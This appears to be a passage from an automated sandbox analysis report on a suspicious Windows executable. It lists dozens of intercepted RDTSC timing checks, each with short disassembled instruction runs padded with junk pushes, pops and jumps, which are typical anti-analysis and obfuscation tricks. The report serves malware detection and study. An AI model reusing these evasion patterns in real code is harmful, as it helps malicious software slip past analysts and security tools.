                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7412EB second address: 7412F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7412F4 second address: 7412FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7415BD second address: 7415C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F7290766B26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7415C8 second address: 7415CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7415CE second address: 7415E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7290766B2Ch 0x0000000e jnc 00007F7290766B26h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6DE0AE second address: 6DE0BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6DE0BF second address: 6DE0D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7290C62CADh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 77E581 second address: 77E585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6CECE8 second address: 6CECEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 783E9A second address: 783EAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 783EAB second address: 783EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 783EB1 second address: 783EBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F7290766B26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 784184 second address: 784194 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7290C62CB2h 0x00000008 js 00007F7290C62CA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 784194 second address: 7841B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jo 00007F7290766B26h 0x00000017 push edx 0x00000018 pop edx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7841B0 second address: 7841E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F7290C62CA6h 0x00000009 jmp 00007F7290C62CB2h 0x0000000e jmp 00007F7290C62CB8h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7848E9 second address: 7848FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jno 00007F7290766B26h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7848FB second address: 7848FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 78934A second address: 789350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 789350 second address: 789354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 789354 second address: 78937B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7290766B26h 0x00000008 jmp 00007F7290766B2Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F7290766B31h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 78937B second address: 7893CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F7290C62CA6h 0x00000009 jmp 00007F7290C62CB3h 0x0000000e jmp 00007F7290C62CB1h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 jmp 00007F7290C62CACh 0x0000001e pop esi 0x0000001f pushad 0x00000020 jnc 00007F7290C62CA6h 0x00000026 pushad 0x00000027 popad 0x00000028 jc 00007F7290C62CA6h 0x0000002e popad 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 78AA66 second address: 78AA6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 78AA6C second address: 78AA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 78AA70 second address: 78AA74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 794282 second address: 79428C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7290C62CA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 79428C second address: 794290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 794290 second address: 794296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 794296 second address: 79429E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 79251C second address: 792522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792522 second address: 792526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792526 second address: 792530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792530 second address: 792536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7927EE second address: 7927F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7927F2 second address: 7927F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7927F6 second address: 792814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7290C62CABh 0x0000000b jo 00007F7290C62CAAh 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792A99 second address: 792AA1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792AA1 second address: 792AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792C37 second address: 792C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792DE5 second address: 792DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7290C62CA6h 0x0000000a pop esi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792DF0 second address: 792E0E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 ja 00007F7290766B26h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 jo 00007F7290766B26h 0x0000001b pushad 0x0000001c popad 0x0000001d pop ecx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792FC3 second address: 792FCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F7290C62CA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 79328E second address: 793297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 793297 second address: 79329D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 79329D second address: 7932A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 791FE2 second address: 791FEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F7290C62CA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 791FEE second address: 791FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7982B7 second address: 7982BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 79BC3A second address: 79BC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 79BC42 second address: 79BC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 79BC47 second address: 79BC62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7290766B2Ch 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c ja 00007F7290766B26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7A7117 second address: 7A7126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F7290C62CA6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7AA847 second address: 7AA850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B1843 second address: 7B1847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B1847 second address: 7B1872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7290766B39h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jo 00007F7290766B40h 0x00000012 push ebx 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B1872 second address: 7B1882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jl 00007F7290C62CA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B0312 second address: 7B032A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B032A second address: 7B0362 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CABh 0x00000007 pushad 0x00000008 jmp 00007F7290C62CB9h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 push edx 0x00000018 pop edx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B0362 second address: 7B0368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B0368 second address: 7B036C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B036C second address: 7B0376 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B0376 second address: 7B037C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B037C second address: 7B0386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7290766B26h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B0386 second address: 7B038A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B038A second address: 7B039A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F7290766B26h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B04F6 second address: 7B052D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F7290C62CA6h 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7290C62CB0h 0x00000018 jmp 00007F7290C62CB4h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B052D second address: 7B0531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7BDAF5 second address: 7BDAFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7BD989 second address: 7BD98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C4B68 second address: 7C4B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C4B6D second address: 7C4B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C4B75 second address: 7C4B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7290C62CA6h 0x0000000a popad 0x0000000b jc 00007F7290C62CAEh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C4CCD second address: 7C4CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C4CD5 second address: 7C4CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C4CDE second address: 7C4CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C4F63 second address: 7C4F69 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C5263 second address: 7C5269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C9D06 second address: 7C9D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C9D12 second address: 7C9D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7290766B26h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C9A20 second address: 7C9A2A instructions: 0x00000000 rdtsc 0x00000002 js 00007F7290C62CA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4D00 second address: 7D4D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7290766B2Bh 0x0000000c jmp 00007F7290766B36h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4D28 second address: 7D4D3D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F7290C62CABh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4D3D second address: 7D4D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7290766B26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F7290766B2Bh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4D57 second address: 7D4D69 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7290C62CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F7290C62CAEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4BA5 second address: 7D4BAA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4BAA second address: 7D4BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jnp 00007F7290C62CA6h 0x0000000c jns 00007F7290C62CA6h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F7290C62CABh 0x0000001b pushad 0x0000001c jmp 00007F7290C62CAFh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E211E second address: 7E2135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F7290766B26h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E2135 second address: 7E2167 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7290C62CA6h 0x00000008 jmp 00007F7290C62CB9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 jl 00007F7290C62CB2h 0x00000016 jo 00007F7290C62CACh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1C41 second address: 7E1C47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1C47 second address: 7E1C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F7290C62CAAh 0x0000000c popad 0x0000000d pushad 0x0000000e ja 00007F7290C62CA8h 0x00000014 jg 00007F7290C62CB2h 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007F7290C62CA6h 0x00000022 jnl 00007F7290C62CA6h 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1C81 second address: 7E1C85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1DD8 second address: 7E1DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290C62CB6h 0x00000009 jg 00007F7290C62CA6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1DFF second address: 7E1E29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007F7290766B37h 0x0000000d js 00007F7290766B28h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1E29 second address: 7E1E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7290C62CA6h 0x0000000a jmp 00007F7290C62CB3h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7E1E4D second address: 7E1E5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
